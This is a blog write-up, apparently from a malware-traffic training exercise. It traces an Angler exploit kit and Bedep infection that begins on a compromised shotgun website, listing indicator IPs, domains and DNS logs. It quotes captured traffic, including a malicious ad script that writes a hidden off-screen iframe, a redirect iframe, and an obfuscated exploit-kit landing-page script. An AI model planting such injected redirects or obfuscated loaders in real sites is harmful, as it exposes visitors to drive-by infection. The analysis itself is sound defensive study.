{"id":278,"date":"2015-12-09T11:18:48","date_gmt":"2015-12-09T11:18:48","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=278"},"modified":"2016-02-23T21:55:13","modified_gmt":"2016-02-23T21:55:13","slug":"malware-exercise-2015-11-24-goofus-and-gallant","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=278","title":{"rendered":"Malware Exercise 2015-11-24 Goofus and Gallant"},"content":{"rendered":"<p>So this one has a great comical backstory &#8211; how the user (ironically from the SOC) Tom brought his personal laptop in and managed to get his system infected while looking for a shotgun to go hunting with. Outside of making me and one of my co-workers laugh at the scenario (and then another one asking if this could be based on a real event &#8211; lol), there is one thing that I learned from this and it was from reading the answers. Brad explains how he went about finding the start of the infection chain from working backwards using the filter of &#8220;ip contains [whatever the EK domain is] &#8221; in Wireshark and keep going up the chain until you get to the start. I will have to remember this for my everyday work as well. Generally, I end up finding the end of the infection chain, and just using the &#8220;referer&#8221; from the TCP Stream to point me into the right direction. Definitely good to know to say the least. <\/p>\n<p>I also did not know that &#8220;Bedep&#8221; will drop encrypted binaries onto the system via memory and NOT onto the disk. For more information about this, <a href=\"http:\/\/twitter.com\/kafeine\" target=\"_blank\">@Kafeine<\/a> has more information about this <a href=\"http:\/\/malware.dontneedcoffee.com\/2014\/08\/angler-ek-now-capable-of-fileless.html\" target=\"_blank\">here<\/a>.<\/p>\n<p>Lastly, since the malicious files were encrypted, I was not able to run them on my test VM. But I do have them along with all the other artifacts from my investigation located on my GitHub page found <a href=\"http:\/\/github.com\/bloomer1016\/Malware-exercise-2015-11-24\" target=\"_blank\">here<\/a>.<\/p>\n<p>Basic Questions to Answer About Exercise:<br \/>\n=========================================<\/p>\n<p>&#8211; Date and time of the activity.<br \/>\n&gt; First Packet: 2015-11-24 10:13:42 \/ Last Packet: 2015-11-24 10:22:23 \/ Elapsed Time: 08:41<\/p>\n<p>&#8211; The infected computer&#8217;s IP address.<br \/>\n&gt; 10.1.25.119<\/p>\n<p>&#8211; The infected computer&#8217;s MAC address.<br \/>\n&gt; a4:1f:72:a6:9c:1b<\/p>\n<p>&#8211; The infected computer&#8217;s host name.<br \/>\n&gt; Turkey-Tom<\/p>\n<p>&#8211; Domains and IP addresses of any infection traffic with VT detection ratio.<br \/>\n&gt; 52.22.18.194:843 | 0 \/ 55<br \/>\n&gt; 52.21.140.191:843 | 0 \/ 56<br \/>\n&gt; 64.34.173.208 | www.showtgunworld.com | 1 \/ 66<br \/>\n&gt; 162.216.4.20 | neuhaus-hourakus.avelinoortiz.com | 2 \/ 66<br \/>\n&gt; 166.78.145.90 | rnhbhnlmpvvdt.com | 8 \/ 66<br \/>\n&gt; 151.80.126.226 | chin.truffleman.co.uk | 1 \/ 66<br \/>\n&gt; 95.211.205.229 | ncqauqvqqhhzpc.com | 1 \/ 66<\/p>\n<p>&#8211; DNS requests noted during the investigation:<br \/>\n&gt; 11981 176.540744  10.1.25.119 63767 8.8.4.4      53 DNS  Standard query 0x2749  A jtikbwiyllxnyi61.com<br \/>\n&gt; 11983 176.819935      8.8.4.4 53 10.1.25.119  63767 DNS  Standard query response 0x2749 No such name<br \/>\n&gt; 11984 176.821924  10.1.25.119 60109 8.8.4.4      53 DNS  Standard query 0xc23c  A ghgmtcrluvghlwc91.com<br \/>\n&gt; 11988 176.915258      8.8.4.4 53 10.1.25.119  60109 DNS  Standard query response 0xc23c  A 127.0.1.1<br \/>\n&gt; 11989 176.926720  10.1.25.119 58168 8.8.4.4      53 DNS  Standard query 0x5cc3  A ghgmtcrluvghlwc91.com<br \/>\n&gt; 11990 177.005193      8.8.4.4 53 10.1.25.119  58168 DNS  Standard query response 0x5cc3  A 127.0.1.1<br \/>\n&gt; 11997 178.041367  10.1.25.119 57199 8.8.4.4      53 DNS  Standard query 0x043c  A qidxwsfqblej.com<br \/>\n&gt; 11998 178.171919      8.8.4.4 53 10.1.25.119  57199 DNS  Standard query response 0x043c No such name<br \/>\n&gt; 11999 178.173503  10.1.25.119 58882 8.8.4.4      53 DNS  Standard query 0xdad5  A lnhxwmhoyjxqmtgn9u.com<br \/>\n&gt; 12000 178.254598      8.8.4.4 53 10.1.25.119  58882 DNS  Standard query response 0xdad5  A 127.0.1.1<br \/>\n&gt; 12001 178.268719  10.1.25.119 52742 8.8.4.4      53 DNS  Standard query 0x1cf7  A lnhxwmhoyjxqmtgn9u.com<br \/>\n&gt; 12002 178.348164      8.8.4.4 53 10.1.25.119  52742 DNS  Standard query response 0x1cf7  A 127.0.1.1<br \/>\n&gt; 12040 179.351621  10.1.25.119 53261 8.8.4.4      53 DNS  Standard query 0xf345  A hsgxnjpdzifkjl4r.com<br \/>\n&gt; 12068 179.449632      8.8.4.4 53 10.1.25.119  53261 DNS  Standard query response 0xf345 No such name<br \/>\n&gt; 12073 179.452374  10.1.25.119 62977 8.8.4.4      53 DNS  Standard query 0x57eb  A xwhrskktvevezz0.com<br \/>\n&gt; 12112 179.540378      8.8.4.4 53 10.1.25.119  62977 DNS  Standard query response 0x57eb No such name<br \/>\n&gt; 12113 179.542265  10.1.25.119 50010 8.8.4.4      53 DNS  Standard query 0x2997  A rnhbhnlmpvvdt.com<br \/>\n&gt; 12158 179.651092      8.8.4.4 53 10.1.25.119  50010 DNS  Standard query response 0x2997  A 166.78.145.90<br \/>\n&gt; 12163 179.663157  10.1.25.119 50005 8.8.4.4      53 DNS  Standard query 0xb4c8  A rnhbhnlmpvvdt.com<br \/>\n&gt; 12194 179.748103      8.8.4.4 53 10.1.25.119  50005 DNS  Standard query response 0xb4c8  A 166.78.145.90<br \/>\n&gt; 12303 179.968038  10.1.25.119 61287 8.8.4.4      53 DNS  Standard query 0xb54b  A qtllebdadvitdim.com<br \/>\n&gt; 12334 180.059365      8.8.4.4 53 10.1.25.119  61287 DNS  Standard query response 0xb54b No such name<br \/>\n&gt; 12335 180.060984  10.1.25.119 56286 8.8.4.4      53 DNS  Standard query 0x9da2  A wyvpeiyaxycznuia6.com<br \/>\n&gt; 12372 180.155660      8.8.4.4 53 10.1.25.119  56286 DNS  Standard query response 0x9da2 No such name<br \/>\n&gt; 12373 180.157299  10.1.25.119 49396 8.8.4.4      53 DNS  Standard query 0xb029  A ncqauqvqqhhzpc.com<br \/>\n&gt; 12411 180.238941      8.8.4.4 53 10.1.25.119  49396 DNS  Standard query response 0xb029  A 95.211.205.229<br \/>\n&gt; 12415 180.252274  10.1.25.119 51862 8.8.4.4      53 DNS  Standard query 0x7ebc  A ncqauqvqqhhzpc.com<br \/>\n&gt; 12453 180.348244      8.8.4.4 53 10.1.25.119  51862 DNS  Standard query response 0x7ebc  A 95.211.205.229<br \/>\n&gt; 13636 193.071344  10.1.25.119 55508 8.8.4.4      53 DNS  Standard query 0x8551  A chin.truffleman.co.uk<br \/>\n&gt; 13637 193.272985      8.8.4.4 53 10.1.25.119  55508 DNS  Standard query response 0x8551  A 151.80.126.226<\/p>\n<p>&#8211; Information about malware found on the infected host.<br \/>\n&gt; The malware associated with this infection looks to be related to Angler EK starting with a Flash exploit.<\/p>\n<p>&#8211; The root cause (what is the likely cause of the infection noted in the pcap).<br \/>\n&gt; The root cause for this infection is from a compromised website (shotgunworld[.]com) with a malicious ad that redirects the end-user to the Angler EK page.<\/p>\n<p>Notes about investigation:<br \/>\n==========================<br \/>\nLooks like the host &#8220;hxxp:\/\/www[.]shotgunworld[.]com&#8221; is the initial site that is compromised via what looks to be a malicious Javascript ad off the shotgunworld site (mind you that this is a hidden iframe from what I can tell):<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/adserver\/www\/delivery\/ajs.php?zoneid=1&amp;withtext=1&amp;cb=99806861739&amp;charset=utf-8&amp;loc=http%3A\/\/www.shotgunworld.com\/&amp;referer=http%3A\/\/www.google.com\/url%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26source%3Dweb%26cd%3D1%26sqi%3D2%26ved%3D0ahUKEwiKnu-0uqnJAhUIWD4KHal9DUcQFggcMAA%26url%3Dhttp%253A%252F%252Fwww.shotgunworld.com%252F%26usg%3DAFQjCNEURWbI-lwIgSRkGqiR9ALrodRMUw%26bvm%3Dbv.108194040%2Cd.dmo HTTP\/1.1\r\n\tAccept: application\/javascript, *\/*;q=0.8\r\n\tReferer: http:\/\/www.shotgunworld.com\/\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: www.shotgunworld.com\r\n\tConnection: Keep-Alive\r\n\tCookie: OAID=380cc1bbe19b8e1255013f1f986ddebe; OAVARS&#x5B;abf85608]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22oadest%22%3Bs%3A26%3A%22http%3A%2F%2Fwww.gueriniusa.com%2F%22%3B%7D; __utma=249653828.1397841079.1448381776.1448381776.1448381776.1; __utmb=249653828.3.10.1448381776; __utmc=249653828; __utmz=249653828.1448381776.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmt_UA-44006917-3=1; __utmt_UA-24085258-3=1; __utmt_UA-17979443-1=1\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tDate: Tue, 24 Nov 2015 16:16:24 GMT\r\n\tServer: Apache\/2.2.3 (CentOS)\r\n\tX-Powered-By: PHP\/5.1.6\r\n\tPragma: no-cache\r\n\tCache-Control: private, max-age=0, no-cache\r\n\tExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\n\tP3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;\r\n\tSet-Cookie: OAID=380cc1bbe19b8e1255013f1f986ddebe; expires=Wed, 23-Nov-2016 16:16:24 GMT; path=\/\r\n\tContent-Length: 1479\r\n\tConnection: close\r\n\tContent-Type: text\/javascript; charset=utf-8\r\n\r\n\tvar OX_7f561e63 = '';\r\n\tOX_7f561e63 += &quot;&lt;&quot;+&quot;iframe style=\\&quot;position:absolute;left:-3060px;top:-4000px;width:360px;height:357px;\\&quot; src=\\&quot;http:\/\/solution.babyboomershopping.org\/respondents\/header.js\\&quot;&gt;&lt;&quot;+&quot;\/iframe&gt;&lt;&quot;+&quot;a href=\\'http:\/\/www.shotgunworld.com\/adserver\/www\/delivery\/ck.php?oaparams=2__bannerid=3__zoneid=1__cb=0d1dc4c39c__oadest=http%3A%2F%2Fwww.americhoke.com\\' target=\\'_blank\\'&gt;&lt;&quot;+&quot;img src=\\'http:\/\/www.shotgunworld.com\/AmerichokeBanner.gif\\' width=\\'468\\' height=\\'60\\' alt=\\'Americhoke\\' title=\\'Americhoke\\' border=\\'0\\' \/&gt;&lt;&quot;+&quot;\/a&gt;&lt;&quot;+&quot;br \/&gt;&lt;&quot;+&quot;a href=\\'http:\/\/www.shotgunworld.com\/adserver\/www\/delivery\/ck.php?oaparams=2__bannerid=3__zoneid=1__cb=0d1dc4c39c__oadest=http%3A%2F%2Fwww.americhoke.com\\' target=\\'_blank\\'&gt;Choke tube installation  barrel porting  adjustable combs&lt;&quot;+&quot;\/a&gt;&lt;&quot;+&quot;div id=\\'beacon_0d1dc4c39c\\' style=\\'position: absolute; left: 0px; top: 0px; visibility: hidden;\\'&gt;&lt;&quot;+&quot;img src=\\'http:\/\/www.shotgunworld.com\/adserver\/www\/delivery\/lg.php?bannerid=3&amp;amp;campaignid=3&amp;amp;zoneid=1&amp;amp;loc=http%3A%2F%2Fwww.shotgunworld.com%2F&amp;amp;referer=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26source%3Dweb%26cd%3D1%26sqi%3D2%26ved%3D0ahUKEwiKnu-0uqnJAhUIWD4KHal9DUcQFggcMAA%26url%3Dhttp%253A%252F%252Fwww.shotgunworld.com%252F%26usg%3DAFQjCNEURWbI-lwIgSRkGqiR9ALrodRMUw%26bvm%3Dbv.108194040%2Cd.dmo&amp;amp;cb=0d1dc4c39c\\' width=\\'0\\' height=\\'0\\' alt=\\'\\' style=\\'width: 0px; height: 0px;\\' \/&gt;&lt;&quot;+&quot;\/div&gt;\\n&quot;;\r\n\tdocument.write(OX_7f561e63);\r\n\t<\/pre>\n<p>Once the connection is made from &#8216;solution[.]babyboomershopping[.]org&#8217; I see that there is another redirect made to the site &#8216;neuhaus-hourakus[.]avelinoortiz[.]com\/&#8217;:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/respondents\/header.js HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tReferer: http:\/\/www.shotgunworld.com\/\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: solution.babyboomershopping.org\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\r\n\tDate: Tue, 24 Nov 2015 16:18:32 GMT\r\n\tContent-Type: text\/html; charset=utf-8\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\tX-Powered-By: PHP\/5.3.3\r\n\r\n\tc0\r\n\t&lt;iframe style=&quot;position:absolute;left:-3311px;top:-3861px;width:309px;height:326px;&quot; src=&quot;http:\/\/neuhaus-hourakus.avelinoortiz.com\/forums\/viewforum.php?f=15&amp;sid=0l.h8f0o304g67j7zl29&quot;&gt;&lt;\/iframe&gt;\r\n\t0\r\n\t<\/pre>\n<p>Once the connection has been made to &#8216;neuhaus-hourakus[.]avelinoortiz[.]com,&#8217; it looks like it lands the user to an Angler EK landing page since it has that tell-tale page of quotes and scripts spread throughout:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/forums\/viewforum.php?f=15&amp;sid=0l.h8f0o304g67j7zl29 HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tReferer: http:\/\/solution.babyboomershopping.org\/respondents\/header.js\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: neuhaus-hourakus.avelinoortiz.com\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.8.0\r\n\tDate: Tue, 24 Nov 2015 17:13:18 GMT\r\n\tContent-Type: text\/html\r\n\tContent-Length: 94921\r\n\tConnection: keep-alive\r\n\r\n\t&lt;!DOCTYPE html&gt;\r\n\t&lt;html&gt;\r\n\t&lt;head&gt;\r\n\r\n\t&lt;title&gt;\r\n\tyou something that might you,\r\n\t&lt;\/title&gt;\r\n\t&lt;\/head&gt;\r\n\t&lt;body&gt;\r\n\t&lt;strike&gt;\r\n\t  &quot;How horrid all this tumbling about and I believe I have borne with calmness, and she dared not follow her to accept your invitation here?&quot;-- &quot;It was my comfort.\r\n\t&lt;\/strike&gt;\r\n\t&lt;ol&gt;\r\n\t  Yet, though smiling to see them once;\r\n\t &lt;u&gt;\r\n\t  &lt;em&gt;\r\n\t   &quot; This however was not very likely.&quot; &quot;Well, and whose possessions he was monstrous happy, and rather better pasturage for their ease and enjoyment, and only prevented from being her relations too made it appear that she had hoped to be to\r\n\t  &lt;\/em&gt;\r\n\t   might at present confess to her own composure of voice, under which was exactly the reverse of her mind might be found when the life of sin. Her legal allowance was not in the and\r\n\t &lt;\/u&gt;\r\n\t &lt;ol&gt;\r\n\t   A man must pay for his intrusion on that head. The would probably have passed without suspicion, had he married you, he have\r\n\t  &lt;i&gt;\r\n\t    s delicate, enquiries\r\n\t  &lt;\/i&gt;\r\n\t &lt;\/ol&gt;\r\n\t &lt;form&gt;\r\n\t   Their opportunity of introducing it, and on misters They's suggestion; and humoured\r\n\t &lt;\/form&gt;\r\n\t&lt;\/ol&gt;\r\n\t&lt;div style=&quot; width:8px; height:18px;&quot;&gt;&lt;p  ui =&quot;I3Zj-#qm1pQOPHiOOprmDg&quot;&gt;wd&#x5B;'p]i' mO wwhno'V=u ncia'x( nio1t;fWxtv{ard ) wetnaT &amp;nbsp; = e)e; aDa et arDvt(pmtlu; op et {D =dnlmtawn Dt}=hw)( e a e ; t mpadl e eatiDe( -t;T }fo escnnu&amp;lt; x)it btas(iDwo{ n)teaaw dOpmV];'ni = &amp;nbsp;&#x5B;'hw''wo&#x5B;vg'ro ;= u]dWw't e &amp;nbsp;= awaodesilvfrt ;nWvbaM=.niLj cwufO jwv.OWasow cM udbwfLj=.ofvWjn 1uaLbiOdwcMfdiowfu LjWOMv=.wnabct=; &amp;nbsp;i2s nuoff} &amp;nbsp;tcnruy( dt'&#x5B;w o{e)Qeniw]F =t}tnueu rr x' ;f oxTxet {l()tceinni e sut,arr = &amp;nbsp;vlrr&quot;&quot;al=in.(y..ta\/mae &amp;nbsp;hc( )fo i\/0 av ()rg; r= &amp;nbsp;arag &amp;nbsp;;l.ty;ri&amp;lt;neh{) rs=+rttl uie+ + Sr.omhenraCr(aiCgfdop(nara e\/)i&#x5B;3ysrIt,]2 &amp;nbsp; rte)tlnrsu2e;}r ua r cd mu Loj;M}v =ce.tEeyn&quot;(neImeltgBtdcu&quot;) &amp;nbsp;bep1c&quot;GW,aM= pc 2=iG&quot;= &quot;dcln&quot;,G ;1+1&quot;dhnGoi ;c&quot; Cc uftuTe(, &amp;nbsp; r)rv nsxr{ ae w m; o.eg axI=n)(x a= ;clx .x &amp;nbsp;nrodrs=st);MaecGLj&quot;cT x(&quot;&#x5B;+]c(x;r+;0ern 1)G2ut nfctou}fpx en i urT_) &amp;nbsp;{x'fa6ur7T( ,r(e4uk2u606u65k7374325o4246q0oe676c6462766iagg3gc 0,f5i+22327'o x;Treark37'7( u) 6466u3kouu477065252464e0q4ci62 '6o5666627aor,);}t &amp;nbsp;nufi + f cnoVu(){nTgifia x re( vurseAitxenengaro..tdS'IE)1f &amp;amp;== &amp;nbsp;O'(M- &amp;amp;aito.ranoppsanrvgeVixdOf'ni)'irtT.(need\/1 ) &amp;nbsp;n= }te;r {=-ru ! !wn_iD_woId if(_.ELOBA_LVOCNOECERTOOS__NLIE'MRB||_ MNAD( _TEOOSOWS_OCL_OLSRSNENFC'idF))w onA EUniwDeatb; tees a{ast)(s(r);r;u &amp;nbsp;ut eQ eynr}v x,xKaep= a0v rk' sIyeVrtsKl+ u'rik.' a'o +'gyJ.Pdire baulnrsipA v= 'ixpatac, 1 &amp;nbsp;x2= x'10x' &amp;nbsp; 0,+ . x= 04,0_ +_ &amp;nbsp;x 3.'5t;ry{=1wevk &amp;nbsp;. ' &amp;nbsp;xnvteXbxA ;ce1j Oci(t)wd.seei }t ;=w2nour (ce){=alavk &amp;nbsp;c th xfr y &amp;nbsp; e wxvnks{;t= eeiXOj2c} tc)eAbtvx(;ht(e &amp;nbsp;cafk ={ )acxv t;ry{=swevk &amp;nbsp;l e &amp;nbsp;xnvteXbxA ;ce3j Oci(t)cah()x f &amp;nbsp;{ &amp;nbsp;}ectvk= ewidelrt.w=oans;1s &amp;nbsp; } &amp;nbsp;ve{ fix u};}k()attaa sQt(ess beD;)e)y; e ev ru}turr(;n a tha&#x5B;rc4 a tad p ='886oaoii63447666654co86a4g8u26s6267667aau626626,'343323323a4qc7e2o'q46457 6545ac426a0ue67686572676uo0842a6os6686757554uuc666sas627a2662576gu6u34ce4' 3a'333223c,eq624cce75a4657475oqa4208o2o56u7665766u6207a8u8s64u66575466s6c2sau6436g2756762a66630i,uu43i 32323'c'626oai4875o7576666c4o244ueaa62g77766640a0842886u6686676727iio67as6ss26i7666757s8ag2u66a23243362762u2',502o0a6646736' 62oo6502ooa66467667562o0658u6o246u5666727ooo06i6i0s67266767668u6o6a8u6267a67775750sci6aom8a66u2676676usua2644g832u327362360f;or( &amp;nbsp;;0ra=v' ] i &amp;nbsp;p&amp;lt;atdeihtatna h &amp;nbsp;l.g)+ xr( ht_epu;T+ifpaia],sra ;Qtyed t&#x5B;eu)ahta=;af un &amp;nbsp;p tdll}otn T)nv eu ruxci(A{2 &amp;nbsp;=&quot;2r074o75a &amp;nbsp;k6m6646mi2ao5406267776o46270amm027477466766i k= 46,5qs6i2&quot;&quot; 387277a7246 =,&quot;00c6i4k &amp;nbsp;768677450s684&quot;aisa6276a7626 ,870i64a6i7&quot; &amp;nbsp;&quot;56645087ouk81=26276a7626 ,870i64a6i7&quot; &amp;nbsp;&quot;55&quot;44k45,ak02=a4 4 6554 2o652i34=&quot;8545 &amp;nbsp;=&quot;g&quot;o67o650 ,k66aga2s8uo436o2666672o626304 u5&quot; ,=&quot;23236k 66633662os2o4o8qc86623u2332&quot;ec3c4u664a33hadaa' 26 =4 ,tpt &#x5B;q2e74a8o67746666767ias278i20e74q6226466qoa45oqq2g76466667662a8s6oo48432u22762636u,4 'qe0476266343'7o2i478a2a872667666740sqq62o4io56e67662472ais6s60aa63023776630sua264igm44u5273624862q4eaqio6 ,6'44444&quot;2426a4ae027i7776676868s6iq02u67a6442677goo86q4sig7626666752aa6u34u0a&quot; 34&quot;3622230,o27e24q87647746666ai0642sqag7684766722iauo6i840a66o6577666q2ga6auus0336322267244&quot;,4q222a67o7636&quot; 6e48i6a6s4i640726777628ga70o8qa76u5626477iosi760ssg73063636620a6u34u6ai4484462225ime24a,4qs65'6 4&quot;4478aq06i6o8i6645766245u8s26ia88645q6677665oqcs6ieouu26s62666668ou4266i6,'303323323i8486asq'662866 65740iou58is4a76867766562i8o6q68qq67i67655576aag66me6866i2646666ssuo2646oi32u326362360,8 k +ic3k &amp;nbsp;+323' 3'006cuess62467263250ieu76048676e6562677um826iu 8,57s+67667'6k &amp;nbsp;k3+sk '3'3 &amp;nbsp; 2+2c0k,2 &amp;nbsp;'ks2 33k++5 &amp;nbsp;+ek 5,k30' + &amp;nbsp;23 '+k +003i k4 +6k2+3'33 , '+340 3,632+3k3 &amp;nbsp;'0k &amp;nbsp;k3+0k233'3 &amp;nbsp; 2+342c27kmoo86642756676ssuo2644oo44u426362442 &amp;nbsp;k2+ o343k' 4 ',+ 353o73+3 ,c3kg0g24 '6k+3 &amp;nbsp;3256432'k+ &amp;nbsp;03333c'+27k ,6 ko ggk +3 2323 7o030s38+'s25'3 +6+3 3k &amp;nbsp;,gkgc 2k33a235 3gs2o0+s'2037+'k6 k3 + 23kg,c &amp;nbsp;+ 23s32733g23gs'02ao536+, 2 '3' ++ ck k3k 3202333'co5g42sasg73 6k2+++c34k &amp;nbsp; &amp;nbsp;k, 0' 0+k, s 02kk 253'+ 423s3' &amp;nbsp;+ k+k +0'e,52+0 '4ikk+30'3 34 30 &amp;nbsp;k+ 43,30+ 406k 2' 3+'k6 k3+ &amp;nbsp;24k2,0 &amp;nbsp;+004322c'm66o75 33372kos2s8u4436o2676662o64442o u+ 'ok42444, 2+0 '44kg73053 34 32o c+k, g 02kk 363'+ 4330333 'co5g6+2'4g73 6k2+++234k &amp;nbsp; &amp;nbsp;k, 0'0s2s0g8 '7o3533233gck,2 &amp;nbsp; k3204'k++6 + 323s3532+ g7coa0s0g3'2 &amp;nbsp;+k'6a3 034k ,k +2s032ocsk+3g'725323g &amp;nbsp;k+ 43,2a+ 206k 2' 332457'36kg3 gso0sc3++2 k12 s2 +3 ,4k 3'80s5og 0,63g+33723'ck &amp;nbsp;k4 3k3s' a+ 12+23253o73+2 ,c3kg0gs0 '6k+41+a2033'2 k &amp;nbsp; 32so27ggksk 'c632335+ ,4 1 &amp;nbsp;2 2023s'2++ka3375g33632k ',csg4ok+ 2k +'s+o53032 &amp;nbsp; 4240cg' k g4k ,+67+332k 2 0327 3g03gs26+'o536+, 23'' &amp;nbsp;+ &amp;nbsp;ck k4k+0s5og 6,63g+33723'ck &amp;nbsp;k4 ;kro6k + 22+] f ai &amp;nbsp;&amp;lt;(ta ; 0 =vr ip.tleg+dx ;hithnaa+ )pef(aar,]dh&#x5B;tTpu_taiattaaks =)e2s beD ; k=40==3244k &amp;nbsp;k &amp;nbsp; &amp;nbsp;1k3k =k6=p = &amp;nbsp;5 &amp;nbsp; 4k =tda &amp;nbsp; tTxlu}na=ha;l )V; T)uWxeu;rrxe((A 4(00; i &amp;nbsp; &amp;nbsp; &amp;nbsp;a)t1 &amp;nbsp; &lt;\/p&gt;\r\n\t&lt;form&gt;\r\n\t<\/pre>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/12\/Img1.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/12\/Img1.png\" alt=\"Angler EK page\" width=\"2540\" height=\"1183\" class=\"aligncenter size-full wp-image-279\" \/><\/a><\/p>\n<p>From here I can see a POST back to the site &#8211; most likely passing stats about the system to craft the correct exploit:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tPOST \/forums\/fiscal.hypetemplate?machine=0erT2JL5&amp;idea=bAtrR&amp;oh=&amp;other=4vm3vmKv&amp;woman=&amp;shoot=gN9eEjH&amp;process=f2r-BDMy&amp;minute=&amp;larger=kST8&amp;difficult=WgR0Lms5 HTTP\/1.1\r\n\tAccept: *\/*\r\n\tContent-Type: text\/html; charset=utf-8\r\n\tReferer: http:\/\/neuhaus-hourakus.avelinoortiz.com\/forums\/viewforum.php?f=15&amp;sid=0l.h8f0o304g67j7zl29\r\n\tAccept-Language: en-US\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tHost: neuhaus-hourakus.avelinoortiz.com\r\n\tContent-Length: 188\r\n\tConnection: Keep-Alive\r\n\tCache-Control: no-cache\r\n\r\n\tcEZQAoBD1JC2osm3oFWTx6csMwLYXl+8RNz2OEKzknDTEKBSkw4\/mlx1gN\/345+\/pYTRuM5b\/246rNtClafKXD4ry38xe+d968qKHE\/Uo26gHKN5w+cOrO0lxSquj\/PE41q2pvRFKl4MIpPiN1uaJg7lsHGCoUcbJgmQPqmO2CBlBK+6zgUxNzg0MA==HTTP\/1.1 200 OK\r\n\tServer: nginx\/1.8.0\r\n\tDate: Tue, 24 Nov 2015 17:13:21 GMT\r\n\tContent-Type: text\/html\r\n\tContent-Length: 2384\r\n\tConnection: keep-alive\r\n\t<\/pre>\n<p>And here is the malicious Flash file:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/who.olp?save=&amp;effect=VFv9cHM&amp;you=LmzXy&amp;picture=J0sYyqN&amp;why=Dv0ZsHPosOWnZsEC9KJ9myAYKZSGT HTTP\/1.1\r\n\tAccept: *\/*\r\n\tAccept-Language: en-US\r\n\tReferer: http:\/\/neuhaus-hourakus.avelinoortiz.com\/forums\/viewforum.php?f=15&amp;sid=0l.h8f0o304g67j7zl29\r\n\tx-flash-version: 19,0,0,207\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tHost: neuhaus-hourakus.avelinoortiz.com\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.8.0\r\n\tDate: Tue, 24 Nov 2015 17:13:22 GMT\r\n\tContent-Type: application\/x-shockwave-flash\r\n\tContent-Length: 75602\r\n\tConnection: keep-alive\r\n\r\n\tCWS\r\n\t#*..x....X.A.-\r\n\t.`............].....ACp.......w\r\n\t<\/pre>\n<p>And another POST to the server:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tPOST \/station.htm?again=&amp;meet=wuzqI0&amp;indeed=ypZLR7M&amp;artist=&amp;give=V_CvGhey&amp;throw=&amp;agreement=IWAIiztB-DCJSkcANq-qiph2Tah HTTP\/1.1\r\n\tAccept: *\/*\r\n\tAccept-Language: en-US\r\n\tReferer: http:\/\/neuhaus-hourakus.avelinoortiz.com\/who.olp?save=&amp;effect=VFv9cHM&amp;you=LmzXy&amp;picture=J0sYyqN&amp;why=Dv0ZsHPosOWnZsEC9KJ9myAYKZSGT\/&#x5B;&#x5B;DYNAMIC]\r\n\tx-flash-version: 19,0,0,207\r\n\tContent-Type: application\/x-www-form-urlencoded\r\n\tContent-Length: 196\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tHost: neuhaus-hourakus.avelinoortiz.com\r\n\tConnection: Keep-Alive\r\n\tCache-Control: no-cache\r\n\r\n\txWRNDYEAqwYYwZ+peJN+So3iLI4\/QWR\/Z3+2aQkLn2RlsXwiqFOkyIbC1EWZuHWy1CwXdWfy+RfJh1cyIB9dOMCnPQoXtnlZlJOKDFFa85bHYiPt9q9iAnzuol+r63UCM1\/u1X2tFaTTCi1Xked2sZIbqZgt6wuUqzLOo+28kb0VXiGBYGgKMTksMCwwLDIwNw==HTTP\/1.1 200 OK\r\n\tServer: nginx\/1.8.0\r\n\tDate: Tue, 24 Nov 2015 17:13:26 GMT\r\n\tContent-Type: text\/html\r\n\tContent-Length: 5528\r\n\tConnection: 